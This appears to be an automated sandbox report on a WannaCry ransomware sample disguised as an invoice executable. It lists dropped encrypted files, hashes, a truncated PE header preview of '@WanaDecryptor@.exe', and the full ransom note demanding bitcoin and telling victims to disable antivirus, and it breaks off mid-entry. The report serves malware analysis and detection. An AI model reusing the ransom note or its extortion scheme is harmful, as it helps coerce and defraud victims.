                                                          Preview:B.o.[-7'^...n..wg.[..W.3.8.w..Q.f.it"..,..b3....ncm.t..F..E{H....Of!..Y.......G..MZ_..+^.c....j{.....Y..Ki..17.".py..AR..T...f./..9........=......d~r..z..0.s...p..FT...~.....<....rK...m.......}...[...W.U..^.$%...a.f.....PZ.|".`..l.....?E.J1.4.f~x.%..x...iu.*.....q.Wl.._...7.z...D|;..E.G..n...!.F......>.d#..}gdl.3.H.z........:.oz.....2....d.\..LU.I..`H......&.L>....u.}..c....g.P.H.$.0^5.I...x.....p,< x.F/..p......_G...C.Eg...MMR..t^f.G@.'............96w.>..<w@t...N.S1.J.$[X2.}k.-.au..b......v>....P;y....Eh..-m\O ...........,..k`SR2.T6.r....]...4...:.5..sEu..|2...k#..Un.!....\..'..V.A.I.i.~.......C!t.@..R......"Y......^.R..k.f?.?..5...l...X.....g5$.]...+.D.........).Rs....D2..,M`..I..A..%.....oF..5R.x.k.z...C...;.BZX..0..R.......3,5r...y.i.....U.U........G.W...k.kp....>.+(.....PR..uF1z..3..~.7ES.....Uc.h.C=.a"K..$.72....-.i.......Xxs...1B...2.~4...Y..b@]...c.f..."..(J..- ..h..Po.+\*...l......$.Y..:...+..v..{.x.@...+....._..&."..~..z..T...

                                                          C:\Users\user\Documents\WSHEJMDVQC.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8404481728894595
                                                          Encrypted:false
                                                          SSDEEP:24:bkfd936CaatBU3sageBh8ZbDUBFndsZFTTYHAB5u5MZlvbMnxzsl:bkF936FatK3sVewZbITnaZFT+ABw5MZ5
                                                          MD5:027D76AB9E12422D06107E1E2296EF75
                                                          SHA1:C4E74B81EB1BF0F8E0E8FED9439F3C2B8777D51A
                                                          SHA-256:BA9EACC218D8201722592E7D38A19EF5CF5D461C7206527E534D42AE7A86DBD3
                                                          SHA-512:13FF9E1ABC29CF009F650C23F280C51C88FB45F7280369A36B9EC6615D9F41EB137D9016687A5D62C6EC9E0C4077886853BB040A1FB4ACE3653D155CA51F2BA8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Bw.r.O..I...g./...Q.....=..kPLH...N..q....Z"..Di..o..TZY..a'.t..4=^.n@"lo$.*r...Z_e....(&.p.d......7.jf.........Sw..w.i t.>]mvR.......q...9...Aemc......y6.[.&.9h......Ro/c.r.....ul.......M....n.).~..D...&.5(.....s..7Z.U..g.~>E.q......... ...%W................%.|1*.\~E.#.B.A.2...N.jM..+...+..x!.rc.|..Y.33....~HdB....w.1D0.'...n...H.3...O.t6.0q.C1...\...L*../Oo.r.....}.....0.-.q....(S...I@.....~v..v..Kw....4....T........y.........dU..0'~.t.|.y~[.A.L...w.>...d..........D.|sk.9.J=.....y...H..!.......\..<.....dF...%....d.A.....]&......]T/.1k].qL...$.....W..H.l?.D.?.'...F.A...Z..=.*t....u..;ZQ....3#..=........zJ...;8...Ot..a.X.....6...?.t..V...I..".o.dJi...T.)v.......w..ct....p..E0..JJ+L-+|......@$.........|.j..Q..RG.W...a3...~|e..Z....X.:G. ..9..Q_.....-W&l.+....1. .K|@.....h....`...Zw..~. ....X...f.]!8?. Er..h..-.L...'s2........8k.j.y..3.p..*.5...~...v.....;.q.DD..P....5.7W..T._....O..I.m.....C.0.ln...t..S}.A....6$...Z.z....j...~.H}

                                                          C:\Users\user\Documents\WSHEJMDVQC.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8404481728894595
                                                          Encrypted:false
                                                          SSDEEP:24:bkfd936CaatBU3sageBh8ZbDUBFndsZFTTYHAB5u5MZlvbMnxzsl:bkF936FatK3sVewZbITnaZFT+ABw5MZ5
                                                          MD5:027D76AB9E12422D06107E1E2296EF75
                                                          SHA1:C4E74B81EB1BF0F8E0E8FED9439F3C2B8777D51A
                                                          SHA-256:BA9EACC218D8201722592E7D38A19EF5CF5D461C7206527E534D42AE7A86DBD3
                                                          SHA-512:13FF9E1ABC29CF009F650C23F280C51C88FB45F7280369A36B9EC6615D9F41EB137D9016687A5D62C6EC9E0C4077886853BB040A1FB4ACE3653D155CA51F2BA8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Bw.r.O..I...g./...Q.....=..kPLH...N..q....Z"..Di..o..TZY..a'.t..4=^.n@"lo$.*r...Z_e....(&.p.d......7.jf.........Sw..w.i t.>]mvR.......q...9...Aemc......y6.[.&.9h......Ro/c.r.....ul.......M....n.).~..D...&.5(.....s..7Z.U..g.~>E.q......... ...%W................%.|1*.\~E.#.B.A.2...N.jM..+...+..x!.rc.|..Y.33....~HdB....w.1D0.'...n...H.3...O.t6.0q.C1...\...L*../Oo.r.....}.....0.-.q....(S...I@.....~v..v..Kw....4....T........y.........dU..0'~.t.|.y~[.A.L...w.>...d..........D.|sk.9.J=.....y...H..!.......\..<.....dF...%....d.A.....]&......]T/.1k].qL...$.....W..H.l?.D.?.'...F.A...Z..=.*t....u..;ZQ....3#..=........zJ...;8...Ot..a.X.....6...?.t..V...I..".o.dJi...T.)v.......w..ct....p..E0..JJ+L-+|......@$.........|.j..Q..RG.W...a3...~|e..Z....X.:G. ..9..Q_.....-W&l.+....1. .K|@.....h....`...Zw..~. ....X...f.]!8?. Er..h..-.L...'s2........8k.j.y..3.p..*.5...~...v.....;.q.DD..P....5.7W..T._....O..I.m.....C.0.ln...t..S}.A....6$...Z.z....j...~.H}

                                                          C:\Users\user\Downloads\@Please_Read_Me@.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                          C:\Users\user\Downloads\@WanaDecryptor@.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):245760
                                                          Entropy (8bit):6.278920408390635
                                                          Encrypted:false
                                                          SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                          MD5:7BF2B57F2A205768755C07F238FB32CC
                                                          SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                          SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                          SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                          • Antivirus: Virustotal, Detection: 90%, Browse
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\Downloads\AQRFEVRTGL.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.840510355900618
                                                          Encrypted:false
                                                          SSDEEP:24:bkgg+826iFGcvoUNvBO8kmA2g3bxAsUVhPlFnk/A8ixnQR0VV1cvvnKxun:bkbHL+GPsvBO8kf3lYDk/BR0VMnKxu
                                                          MD5:CF157B4F50567E9B34B758393BE86D33
                                                          SHA1:F01F16B1AA368C0DD3F2620D05201D27EA7FEE90
                                                          SHA-256:9030B7EB2DF682D7ABCBA50D71C0424AFEC8CD3ED3CB8911EF680526B4BECA9F
                                                          SHA-512:07735EADF556B0DF5EE21A649469E07BDDD88C0E68DCE60739D91FB6F6033E06F7D39B7C8F050CD0A3B1C5022ACB60086499595E240DB6BC28CF5494325A3A18
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Z#v.KlYT?..[.6.#..zP..>.,..Z@..G.CW...p...R...!".<.8=.~....-7.m0C.#...0|>...t]en........M.qq...o.....'.))d.....X..Y..+C.8....c...v,.8l9.i.A.u...`....(..L(....p......O.#...EX.....xe...i7.K...5..h.6........m).ZIt.T..j+.&......w:..U.Zo.63.r..4..{..U..............>.....h....)a .f..zl#...%..%....a.9.6/..\@..D0.......?......H...k;iV.pf...R.nT..c|......F.^.....(.v.....(..Y8%N{;Y.S.]1rp.7..R.Y.]...3..|.".L......-E_o.L..K)....&{.Z.i....,.e....Y......k7...wR1%.VJlH..eK..>..f.Y.......S..7./.q/S..].h...o\...a....!....>..m...%0....e+ ..........IS.E..J.y3.F..Kx:.....H..D{+.F...~..... .......p+.i+.d6.s.;...O..X.4......m......_..n.}M8kJ.a0ua.L.H..K6..=:.~7. .o4..........W5f_4.R.CE0...r^~D.h...?Hq.....].2.. .;.2.X.r54..!..3~p..0m.........".....[R.a..;^H#K.(.q....'.....I.$..3v..P9..7as..8w.&...yc.$.k..>Z.pz.uh..-.u.0..{...o*s..+P.o[;F.9{..`..0.q.Fm...YJ~e.zv.~......_...~M..P.+....Yj...p......k.h..`>13..UJz[.r.le.?.......*......c.+.Q.^.~.._h3..

                                                          C:\Users\user\Downloads\AQRFEVRTGL.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.840510355900618
                                                          Encrypted:false
                                                          SSDEEP:24:bkgg+826iFGcvoUNvBO8kmA2g3bxAsUVhPlFnk/A8ixnQR0VV1cvvnKxun:bkbHL+GPsvBO8kf3lYDk/BR0VMnKxu
                                                          MD5:CF157B4F50567E9B34B758393BE86D33
                                                          SHA1:F01F16B1AA368C0DD3F2620D05201D27EA7FEE90
                                                          SHA-256:9030B7EB2DF682D7ABCBA50D71C0424AFEC8CD3ED3CB8911EF680526B4BECA9F
                                                          SHA-512:07735EADF556B0DF5EE21A649469E07BDDD88C0E68DCE60739D91FB6F6033E06F7D39B7C8F050CD0A3B1C5022ACB60086499595E240DB6BC28CF5494325A3A18
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Z#v.KlYT?..[.6.#..zP..>.,..Z@..G.CW...p...R...!".<.8=.~....-7.m0C.#...0|>...t]en........M.qq...o.....'.))d.....X..Y..+C.8....c...v,.8l9.i.A.u...`....(..L(....p......O.#...EX.....xe...i7.K...5..h.6........m).ZIt.T..j+.&......w:..U.Zo.63.r..4..{..U..............>.....h....)a .f..zl#...%..%....a.9.6/..\@..D0.......?......H...k;iV.pf...R.nT..c|......F.^.....(.v.....(..Y8%N{;Y.S.]1rp.7..R.Y.]...3..|.".L......-E_o.L..K)....&{.Z.i....,.e....Y......k7...wR1%.VJlH..eK..>..f.Y.......S..7./.q/S..].h...o\...a....!....>..m...%0....e+ ..........IS.E..J.y3.F..Kx:.....H..D{+.F...~..... .......p+.i+.d6.s.;...O..X.4......m......_..n.}M8kJ.a0ua.L.H..K6..=:.~7. .o4..........W5f_4.R.CE0...r^~D.h...?Hq.....].2.. .;.2.X.r54..!..3~p..0m.........".....[R.a..;^H#K.(.q....'.....I.$..3v..P9..7as..8w.&...yc.$.k..>Z.pz.uh..-.u.0..{...o*s..+P.o[;F.9{..`..0.q.Fm...YJ~e.zv.~......_...~M..P.+....Yj...p......k.h..`>13..UJz[.r.le.?.......*......c.+.Q.^.~.._h3..

                                                          C:\Users\user\Downloads\HMPPSXQPQV.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8613432302590045
                                                          Encrypted:false
                                                          SSDEEP:24:bk0zQTTXfQoKKzqD3U25AybqiZVMikJL33r2oB7GsbIDFTzmdVi1cs/rcmtVj:bk3Lf5qzHiIqpikJLHr2oB7GPTqdkLh
                                                          MD5:602B2D27385F3D34A8577B67901AAADC
                                                          SHA1:A81193F576194843326787FE251E1F22AC16DA6F
                                                          SHA-256:C4B993E18DCC53BADC2CA0FB614CC6D32E4BB36EF43177A1459EEA6656ECCAEF
                                                          SHA-512:2767CBB9A8416970C0D44F583129201E25215F035E698E366EDEE18DEA5B0C70E007E1587F52E424A687DF363E3338AE5E654687A7DE516DD61D01C7DF9B661E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....QR....O....?.#@.k..,.t.g.....^3J..r5ka.......]c.F.p...v_.*.nG%e....wR..7..q..L.J......y.K....Rw.[\6b\..!/%..@.`r..%....../.....}.8SNN.'?..@2...+.#a.gK........ 5L.P....j8oOh.I.,.rK.Q%..[U./......g.cD.[.M.&3.o.....aR}.r..6.0D..j......(k.KB...][.4.............a.v:...\xiU.9J0`s.....[..g..`Y....)19...\..S.B?$..x...*...r........q@A.9..B?.8....X.J...|...d.h.!.<...r...3.M.'...5:.'....T&............\..f.=....#5.I.g-y......T.Oi...)/ON.H_/.x..!.........%'ly.F....JX...4l..."Et....5.>;....pI.m.Z...m..B&........'.H.m?..f.0..&.N.b...i.J\....6.Q..d....@[._..@./@..s.....)$.cx\.Ok.......|....%..".......[....;.M\..=.1....PM.=*:..s........%Cy)..........T....K%..?........L...*>.3..a.x..3wB0.._...H....eA.~..z..o.>..{!...gr.h.....j...H..k.y.>2'i..i........$.t../.......{.d..D.}.".h....7.......W..jL..Fe.-.Ud..?E<K........'*&.y..t.....`.@..o.:.k...RZY.(u..Q6..=2]..~.|.5...vy8N.....d.g.*..o{] ..p;.}........N.....X....y.h.b%.<.>.....{...G...+'.

                                                          C:\Users\user\Downloads\HMPPSXQPQV.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8613432302590045
                                                          Encrypted:false
                                                          SSDEEP:24:bk0zQTTXfQoKKzqD3U25AybqiZVMikJL33r2oB7GsbIDFTzmdVi1cs/rcmtVj:bk3Lf5qzHiIqpikJLHr2oB7GPTqdkLh
                                                          MD5:602B2D27385F3D34A8577B67901AAADC
                                                          SHA1:A81193F576194843326787FE251E1F22AC16DA6F
                                                          SHA-256:C4B993E18DCC53BADC2CA0FB614CC6D32E4BB36EF43177A1459EEA6656ECCAEF
                                                          SHA-512:2767CBB9A8416970C0D44F583129201E25215F035E698E366EDEE18DEA5B0C70E007E1587F52E424A687DF363E3338AE5E654687A7DE516DD61D01C7DF9B661E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....QR....O....?.#@.k..,.t.g.....^3J..r5ka.......]c.F.p...v_.*.nG%e....wR..7..q..L.J......y.K....Rw.[\6b\..!/%..@.`r..%....../.....}.8SNN.'?..@2...+.#a.gK........ 5L.P....j8oOh.I.,.rK.Q%..[U./......g.cD.[.M.&3.o.....aR}.r..6.0D..j......(k.KB...][.4.............a.v:...\xiU.9J0`s.....[..g..`Y....)19...\..S.B?$..x...*...r........q@A.9..B?.8....X.J...|...d.h.!.<...r...3.M.'...5:.'....T&............\..f.=....#5.I.g-y......T.Oi...)/ON.H_/.x..!.........%'ly.F....JX...4l..."Et....5.>;....pI.m.Z...m..B&........'.H.m?..f.0..&.N.b...i.J\....6.Q..d....@[._..@./@..s.....)$.cx\.Ok.......|....%..".......[....;.M\..=.1....PM.=*:..s........%Cy)..........T....K%..?........L...*>.3..a.x..3wB0.._...H....eA.~..z..o.>..{!...gr.h.....j...H..k.y.>2'i..i........$.t../.......{.d..D.}.".h....7.......W..jL..Fe.-.Ud..?E<K........'*&.y..t.....`.@..o.:.k...RZY.(u..Q6..=2]..~.|.5...vy8N.....d.g.*..o{] ..p;.}........N.....X....y.h.b%.<.>.....{...G...+'.

                                                          C:\Users\user\Downloads\HMPPSXQPQV.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.831682045151621
                                                          Encrypted:false
                                                          SSDEEP:24:bkA9A4IWPf8EUFmpbGl3e6MZrKRs9gMrqCUeZmvRsSaj5+oVkQdE7JCn:bkJ4BPf8LFmpgO6OryDMOCepsSaj55Vj
                                                          MD5:B2EBBBE9BF4B84EDC578B71AF2FA0DD9
                                                          SHA1:D2F615927C7857A559DFDEA23934F4AAD92B239C
                                                          SHA-256:26E659994D7829336F197F38DE351564E4A4CE11FBBB26545B43C3DE2ADF0EA4
                                                          SHA-512:BD7985387EC106EF40CC2FF8EB56BD873587F0322332B877000AD03D7C24D87A7D74F116C93E871B7D5B7503DCCB44493D809FAE34D7984E8ADC401640D6E308
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....ss..;....(....6^.l..<#6>.....g.P.j&p.e...p.1.?....}.u@.qzG..YWP...W~...%b.<.@&.$.3..^......(.....LY{........2.&v.x'1M.*.../8..2l]v.(*.`t1..a.b|-P/.....uO/Z].C.T..L...>Z..s...j]...|8._r.....<..~c.2J..P}?..`$Y$..L.>.h0(..>....K...J.....Ov.s.................7...st...E...c.C.....^9~=?u.v....h..../.}.~.....I.L.L..HP...p?....H..DZ....+.....wz-........I..u.b"m(_...-.6.....'=.r#8.....e'.N .J..?...Ra.I......Wv.E.kj6...7...(....o:f.@N..|.<....Y.a.0$.q..g..W....L.~y9.K...\..h8#G./7z..$k.........Y.@.....+.$..O.y....Z.ce8......y."..N/g..B,8......C.#.F).c.} "...3.....w=&p..Ew...p.. ...,.2fZ.m.*.50..A.......q....#./0.Mz...Y.......~d........1....?~q...pw\2.,...u..6.I........{I.X.g.7....eQ..xV._5..8.E..KJ.......p.....<._X.T#.h\..7.tW.m.:..A@...% .!.0.DC.v..iU.a..a5..Z[m...G..w."m..m.....`.-.H....uuA~N.+?s..H...L$...@.Ml\(.dh......8.&..J.#.F.[K.<wM...,....H..9..:...].Z....%.Z._.a...m.(.X..a..v..KX....`.4p.@xa.P#.\..9....E....D.......Ah.Gm..

                                                          C:\Users\user\Downloads\HMPPSXQPQV.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.831682045151621
                                                          Encrypted:false
                                                          SSDEEP:24:bkA9A4IWPf8EUFmpbGl3e6MZrKRs9gMrqCUeZmvRsSaj5+oVkQdE7JCn:bkJ4BPf8LFmpgO6OryDMOCepsSaj55Vj
                                                          MD5:B2EBBBE9BF4B84EDC578B71AF2FA0DD9
                                                          SHA1:D2F615927C7857A559DFDEA23934F4AAD92B239C
                                                          SHA-256:26E659994D7829336F197F38DE351564E4A4CE11FBBB26545B43C3DE2ADF0EA4
                                                          SHA-512:BD7985387EC106EF40CC2FF8EB56BD873587F0322332B877000AD03D7C24D87A7D74F116C93E871B7D5B7503DCCB44493D809FAE34D7984E8ADC401640D6E308
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....ss..;....(....6^.l..<#6>.....g.P.j&p.e...p.1.?....}.u@.qzG..YWP...W~...%b.<.@&.$.3..^......(.....LY{........2.&v.x'1M.*.../8..2l]v.(*.`t1..a.b|-P/.....uO/Z].C.T..L...>Z..s...j]...|8._r.....<..~c.2J..P}?..`$Y$..L.>.h0(..>....K...J.....Ov.s.................7...st...E...c.C.....^9~=?u.v....h..../.}.~.....I.L.L..HP...p?....H..DZ....+.....wz-........I..u.b"m(_...-.6.....'=.r#8.....e'.N .J..?...Ra.I......Wv.E.kj6...7...(....o:f.@N..|.<....Y.a.0$.q..g..W....L.~y9.K...\..h8#G./7z..$k.........Y.@.....+.$..O.y....Z.ce8......y."..N/g..B,8......C.#.F).c.} "...3.....w=&p..Ew...p.. ...,.2fZ.m.*.50..A.......q....#./0.Mz...Y.......~d........1....?~q...pw\2.,...u..6.I........{I.X.g.7....eQ..xV._5..8.E..KJ.......p.....<._X.T#.h\..7.tW.m.:..A@...% .!.0.DC.v..iU.a..a5..Z[m...G..w."m..m.....`.-.H....uuA~N.+?s..H...L$...@.Ml\(.dh......8.&..J.#.F.[K.<wM...,....H..9..:...].Z....%.Z._.a...m.(.X..a..v..KX....`.4p.@xa.P#.\..9....E....D.......Ah.Gm..

                                                          C:\Users\user\Downloads\HQJBRDYKDE.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.865951896951833
                                                          Encrypted:false
                                                          SSDEEP:24:bkw1mgrZN3i21/Bq9G+34xcZ6mDau4Ck40BKTCQRV3tXCUxck:bkw13Pi2FBz+34xcxa3PHBKHRVlCUWk
                                                          MD5:0EAD69EAAC8E9B63A2410622673276C5
                                                          SHA1:55D1EBCF88470547140D662C8429B7B8BA52DA2A
                                                          SHA-256:94791D931FCD19E8AF3A51A21307844BE4DFE7B2314785B04EA0BCA919CF85A2
                                                          SHA-512:548D0BBFC02127B2EF479AD111B166276D6F744947234DA73489CB69609E1712B8E90931C26FD5BF5B5309250B15650BF42902857468BBE4F2240E2FFEDD91C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....1"..............6.-...stCr.9j[.vi`.8..^w>.\.k..B'...1c.,.%.m....~..k'.P^...{..l .Zn3V.N7....{..e..<mf............*.1...X..#P6.....N..7.F.....%.9..9..7..o.Fwk.}..n......S..P%<.........G.,U;)..lQP"..v..q....3.\cDS..'1..X?.V.....n..R....@.v.CBaX...............hi.J%S..c..m..%...2.M...|].v......#..T.....=..jY.m..o......9pR....\....[.F;...P...#....L..!..;.R. .=.[\DO=....@....U.....N..z...Z.}J]....:5>h.()j.I.P..E.a..k.u.$.v>..ns...T..N...@8W...H...A..W.L7R[g....Z...U...n.#,....c........-...J_..d._.$Y-..:....(E5..!.Wm....mP..,.k2b<9miR..q.h-...$.n..N.K..-..~....G..%'+..#.LD!.]..........6XF.JQM.'-&..1..g.p.....6|L.....\.8..*%2..z..b.+.U.......fi.Ka.4$...9..N#..C.....IwJ..D/...k.F.+.....t.;t..X........,...6_.........^+0..z..A..O#D.........[.z..Va#c.e(6?.2.Y.`Q4a.H.R.}*..%....*..y.'.D..[....0...h+..GiHW.."......q.@...@7W.T.V.q...'...$8s.....D:.>*.....8......F.&#W-...b......q.{O%p.Fv.....I&........Z....w..{8..S..y.M;Pc.|...q.Ru...w.

                                                          C:\Users\user\Downloads\HQJBRDYKDE.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.865951896951833
                                                          Encrypted:false
                                                          SSDEEP:24:bkw1mgrZN3i21/Bq9G+34xcZ6mDau4Ck40BKTCQRV3tXCUxck:bkw13Pi2FBz+34xcxa3PHBKHRVlCUWk
                                                          MD5:0EAD69EAAC8E9B63A2410622673276C5
                                                          SHA1:55D1EBCF88470547140D662C8429B7B8BA52DA2A
                                                          SHA-256:94791D931FCD19E8AF3A51A21307844BE4DFE7B2314785B04EA0BCA919CF85A2
                                                          SHA-512:548D0BBFC02127B2EF479AD111B166276D6F744947234DA73489CB69609E1712B8E90931C26FD5BF5B5309250B15650BF42902857468BBE4F2240E2FFEDD91C9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....1"..............6.-...stCr.9j[.vi`.8..^w>.\.k..B'...1c.,.%.m....~..k'.P^...{..l .Zn3V.N7....{..e..<mf............*.1...X..#P6.....N..7.F.....%.9..9..7..o.Fwk.}..n......S..P%<.........G.,U;)..lQP"..v..q....3.\cDS..'1..X?.V.....n..R....@.v.CBaX...............hi.J%S..c..m..%...2.M...|].v......#..T.....=..jY.m..o......9pR....\....[.F;...P...#....L..!..;.R. .=.[\DO=....@....U.....N..z...Z.}J]....:5>h.()j.I.P..E.a..k.u.$.v>..ns...T..N...@8W...H...A..W.L7R[g....Z...U...n.#,....c........-...J_..d._.$Y-..:....(E5..!.Wm....mP..,.k2b<9miR..q.h-...$.n..N.K..-..~....G..%'+..#.LD!.]..........6XF.JQM.'-&..1..g.p.....6|L.....\.8..*%2..z..b.+.U.......fi.Ka.4$...9..N#..C.....IwJ..D/...k.F.+.....t.;t..X........,...6_.........^+0..z..A..O#D.........[.z..Va#c.e(6?.2.Y.`Q4a.H.R.}*..%....*..y.'.D..[....0...h+..GiHW.."......q.@...@7W.T.V.q...'...$8s.....D:.>*.....8......F.&#W-...b......q.{O%p.Fv.....I&........Z....w..{8..S..y.M;Pc.|...q.Ru...w.

                                                          C:\Users\user\Downloads\LHEPQPGEWF.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.853909570516871
                                                          Encrypted:false
                                                          SSDEEP:24:bkIWMqFOTOGvJDh4VfZYUEDrjmuj47I0n3usTXciuP58Y/fPTWDvrgPMtB:bkIWMyeJDh4nk+y475Ai658YXPTWQPk
                                                          MD5:4E11A9B86C1CFB9AE41888E58CFBC8D4
                                                          SHA1:8B7D5BAF14C65E00668168A4709794F16DAC2C4F
                                                          SHA-256:96EDF10C8840EB3159DE96E64B52B4F10E0A646FBC149C858381E6154D543C4F
                                                          SHA-512:68877016CA1B76D0D7037C2028A291B9FA7F9BF88089BD01E726C8C23C89A546F8513BF03B4A7A2BC25778FF150273E183688BB8932056F6881D9A9348960E6F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....An."..'.0..t[..z.N..R.^"_...,MY.^t..a..4.b.5e.t...ghQ..3.,...j.6.Jz9...W{n:.D...k...].Z.....V...N..E...'...m+.;.].F.zyQ._..y2&.t....G.^%.j.A../y;.......V.k./...5..b....:^...{......_.iH...e..k.w{....If.8../.y.t..r.Bl.N......p..K6.dZ..0.C.S..............9.S...`.h!n...r.i..<....n*...j..4!n..i..B..rW=~D?)......l.........ki-.D......A2.DR#..N.Z..9.M...T5......G.+...O#w....j........p.y..Y.D..yn+...\4..'.Km..{......"t.]=n..........O'.?.e.j..N..?.~..e@..e.l.}Y%.B..$q..'..u.B..P.!..^._...>S.0..+..n1.x.M8....=1.0...;.=.....G..."....b.t.rP..".7..E.}.f...*.S.;..)K8#.....i.......Jf...I.n.Z..2l...Td.bd?.M.....Zwi6..[...'.............]..^..xw~..Q....:.^... .R7..=._.....,;..={..?^\......0......0.e.....O.8.i.&]..w..z."O....+=3.....P}..swn.VH.o.F.....;..DA.~.W...x<~1.ji.:(;I.......-.qpG].,0...g..g.5TN.a.."s...i.r......AU1..>.|...V{../.......&./=.m..K....F.....s-..2B....<.3."~.&9*.{......YP).......^:.._3+{C.n(x..S!..'...T. sQ...F.~....

                                                          C:\Users\user\Downloads\LHEPQPGEWF.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.853909570516871
                                                          Encrypted:false
